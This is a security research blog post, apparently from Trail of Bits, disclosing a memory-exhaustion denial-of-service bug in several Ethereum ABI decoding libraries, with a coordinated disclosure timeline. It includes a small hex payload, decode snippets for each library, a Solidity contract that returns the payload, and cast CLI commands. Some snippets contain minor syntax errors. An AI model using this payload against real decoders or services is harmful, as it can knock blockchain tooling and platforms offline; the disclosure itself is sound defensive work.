Billion times emptiness

By Max Ammann

Behind Ethereum’s powerful blockchain technology lies a lesser-known challenge that blockchain developers face: the intricacies of writing robust Ethereum ABI (Application Binary Interface) parsers. Ethereum’s ABI is critical to the blockchain’s infrastructure, enabling seamless interactions between smart contracts and external applications. The complexity of data types and the need for precise encoding and decoding make ABI parsing challenging. Ambiguities in the specification or implementation may lead to bugs that put users at risk.

In this blog post, we’ll delve into a newfound bug that targets these parsers, reminiscent of the notorious “Billion Laughs” attack that plagued XML in the past. We uncover that the Ethereum ABI specification was written loosely in parts, leading to potentially vulnerable implementations that can be exploited to cause denial-of-service (DoS) conditions in eth_abi (Python), ethabi (Rust), alloy-rs and etheriumjs-abi, posing a risk to the availability of blockchain platforms. At the time of writing, the bug is fixed only in the Python library. All other libraries decided on full disclosure through GitHub issues.

What is the Ethereum ABI?

Whenever contracts on the chain interact or off-chain components talk to the contracts, Ethereum uses ABI encoding for encoding requests and responses. The encoding does not describe itself. Instead, encoders and decoders need to provide a schema that defines the represented data types. Compared to the platform-dependent ABI in the C programming language, Ethereum specifies how data can be passed between applications in binary representation. Even though the specification is not formal, it gives a good understanding of how data is exchanged.

Currently, the specification lives in the Solidity documentation. The ABI definition influences the types used in languages for smart contracts, like Solidity and Vyper.

Understanding the bug

Zero-sized types (ZST) are data types that take zero (or minimal) bytes to store on disk but substantially more to represent once loaded in memory. The Ethereum ABI allows zero-sized-types (ZST). ZSTs can cause a denial of service (DoS) attack by forcing the application to allocate an immense amount of memory to handle a tiny amount of on-disk or over-the-network representation.

Consider the following example: What will happen when a parser encounters an array of ZSTs? It should try to parse as many ZST as the array claims to contain. Because each array element takes zero bytes, defining an enormously large array of ZSTs is trivial.

As a concrete example, the following figure shows a payload of 20 on-disk bytes, which will deserialize to an array of the numbers 2, 1, and 3. A second payload of 8 on-disk bytes will deserialize to 232 elements of a ZST (like an empty tuple or empty array).

This would not be a problem if each ZST took up zero bytes of memory after parsing. In practice, this is rarely the case. Typically, each element will require a small but non-zero amount of memory to store, leading to an enormous allocation to represent the entire array. This leads to a denial of service attack.

Robust parser design is crucial to prevent severe issues like crashes, misinterpretations, hangs, or excessive resource usage. The root cause of such issues can lie in either the specifications or the implementations.

In the case of the Ethereum ABI, I argue that the specification itself is flawed. It had the opportunity to explicitly prohibit Zero-Size Types (ZST), yet it failed to do so. This oversight contrasts with the latest Solidity and Vyper versions, where defining ZSTs, such as empty tuples or arrays, is impossible.

To ensure maximum safety, file format specifications must be crafted carefully, and their implementations must be rigorously fortified to avoid unforeseen behaviors.

Proof of concept

Let’s dive into some examples that showcase the bug in several libraries. We define the data payload as:

0000000000000000000000000000000000000000000000000000000000000020
00000000000000000000000000000000000000000000000000000000FFFFFFFF

The payload consists of two 32-byte blocks describing a serialized array of ZSTs. The first block defines an offset to the array’s elements. The second block defines the length of the array. Independent of the programming language, we will always reference it as payload.

We will try to decode this payload using the ABI schemata ()[] and uint32[0][] using several different Ethereum ABI parsing libraries. The former representation is a dynamic array of empty tuples, and the latter is a dynamic array of empty static arrays. The distinction between dynamic and static is important because an empty static array takes zero bytes, whereas a dynamic one takes a few bytes because it serializes the length of the array.

eth_abi (Python)

The following Python program uses the official eth_abi library (<4.2.0); the program will first hang and then terminate with an out-of-memory error.

from eth_abi import decode
data = bytearray.fromhex(payload)
decode(['()[]'], data)

The eth_abi library only supported the empty tuple representation; an empty static array was undefined.

ethabi (Rust)

The ethabi library (v18.0.0) allows triggering the bug directly from its CLI.

cargo run -- decode params -t "uint32[0][]" $payload

ethers-rs (Rust)

The following Rust program uses the ethers-rs library and the schema uint32[0][] implicitly through the Rust type Vec<[u32; 0]>, which corresponds to it.

use ethers::abi::AbiEncode;
let data = hex::decode(payload);
let _ = Vec::<[u32; 0]>::decode(&hex_output.unwrap()).unwrap();

It is vulnerable to the DoS issue because the ethers-rs library (v2.0.10) uses ethabi.

foundry (Rust)

The foundry toolkit uses ethers-rs, which suggests that the DoS vector should also be present there. It turns out it is!

One way to trigger the bug is by directly decoding the payload via the CLI, just like in ethabi.

cast --abi-decode "abc()(uint256[0][])" $payload

Another, more interesting proof of concept is to deploy the following malicious smart contract. It uses assembly to return data that matches the payload.

contract ABC {
    fallback() external {
        bytes memory data = abi.encode(0x20, 0xfffffffff);
    assembly {
        return(add(data, 0x20), mload(data))
    }
}

}

If the contract’s return type is defined, it can lead to a hang and huge memory consumption in the CLI tool. The following command calls the contract on a testnet.

cast call --private-key \
0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80 \
-r http://127.0.0.1:8545 0x5fbdb2315678afecb367f032d93f642f64180aa3 \
"abc() returns (uint256[0][])”

alloy-rs

The ABI parser in alloy-rs (0.4.2) encounters the same hang as the other libraries if the payload is decoded.

use alloy_dyn_abi::{DynSolType, DynSolValue};
let my_type: DynSolType = "()[]".parse().unwrap();
let decoded = my_type.abi_decode(&hex::decode($payload).unwrap()).unwrap();

etheriumjs-abi

Finally, the ABI parser etheriumjs-abi (0.6.8) library is also vulnerable.

var abi = require('ethereumjs-abi')
data = Buffer.from($payload", "hex")
abi.rawDecode([ "uint32[]" ], data)
// or this call: abi.rawDecode([ "uint32[0][]" ], data)

Other libraries

The libraries go-ethereum and ethers.js do not have this bug because they implicitly disallow ZST. The libraries expect that each element of an array is at least 32 bytes long. The web3.js library is also not affected because it uses ethers-js.

How the bug was discovered

The idea for testing for this type of bug came after I stumbled upon an issue in the borsh-rs library. The Rust library tried to parse an array of ZST in constant time, which caused undefined behavior, in order to mitigate the DoS vector. The library’s authors ultimately decided to simply disallow ZST completely. During another audit, a custom ABI parser also had a DoS vector when parsing ZSTs. Seeing as these two issues were unlikely to be a coincidence, we investigated other ABI parsing libraries for this bug class.

How to exploit it

Whether this bug is exploitable depends on how the affected library is used. In the examples above, the demonstration targets were CLI tools.

I did not find a way to craft a smart contract that triggers this bug and deploys it to the mainnet. This is mainly because Solidity and Vyper programs disallow ZST in their latest version.

However, any application that uses one of the above libraryis potentially vulnerable. An example of a potentially vulnerable application is Etherscan, which parses untrusted ABI declarations. Also, any off-chain software fetching and decoding data from contracts could be vulnerable to this bug if it allows users to specify ABI types.

Fuzz your decoders!

Bugs in decoders are usually easy to catch through fuzzing the decoding routine because inputs are commonly byte arrays that can be used directly as input for fuzzers. Of course, there are exceptions, like the recent libwebp 0-day (CVE-2023-5129) that was not discovered through endless hours of fuzzing in OSS-fuzz.

In our audits at Trail of Bits, we employ fuzzing to identify bugs and educate clients on how to conduct their own fuzzing. We aim to contribute our fuzzers to Google’s OSS-fuzz for continual testing, thus supplementing manual reviews by prioritizing crucial audit components. We’re updating our Testing Handbook, an exhaustive resource for developers and security professionals to include specific guidance for optimizing fuzzer configuration and automation of analysis tools throughout the software development lifecycle.

Coordinated disclosure

As part of the disclosure process, we reported the vulnerabilities to the library authors.

  • eth_abi (Python): The Etherium-owned library fixed the bug as part of a private GitHub advisory. The bug was fixed in version v4.2.0.
  • ethabi (Rust) and alloy-rs: The maintainers of the crates asked that we open GitHub issues after the end of the embargo period. We created the corresponding issues here and here.
  • etheriumjs-abi: We got no response from the project and thus created a GitHub issue.
  • ethers-rs and foundry: We informed the projects about their usage of ethabi (Rust). We expect they will update to the patched versions of ethabi as soon as they are available or switch to another ABI decoding implementation. The general community will be notified by releasing a RustSec advisory for ethabi and alloy-rs and a GitHub advisory for eth_abi (Python).

The timeline of disclosure is provided below:

  • June 30, 2023: Initial reach out to maintainers of ethabi (Rust), eth_abi (Python), alloy-rs and etheriumjs-abi crates.
  • June 30, 2023: Notification by the alloy-rs maintainers that a GitHub issue should be created.
  • June 30, 2023: First response by the eth_abi (Python) project and internal triaging started.
  • July 26, 2023: Clarifying ethabi’s maintenance status through a GitHub issue. This led to a notice in the README file. This means we are going to post a GitHub issue after the embargo.
  • August 2, 2023: Created private security advisory on GitHub for eth_abi (Python).
  • August 31, 2023: Fix is published by eth_abi (Python) without public references to the DoS vector. We later verified this fix.
  • December 29, 2023: Publication of this blog post and GitHub issues in the ethabi, alloy-rs, and etheriumjs-abi repositories.

Article Link: Billion times emptiness | Trail of Bits Blog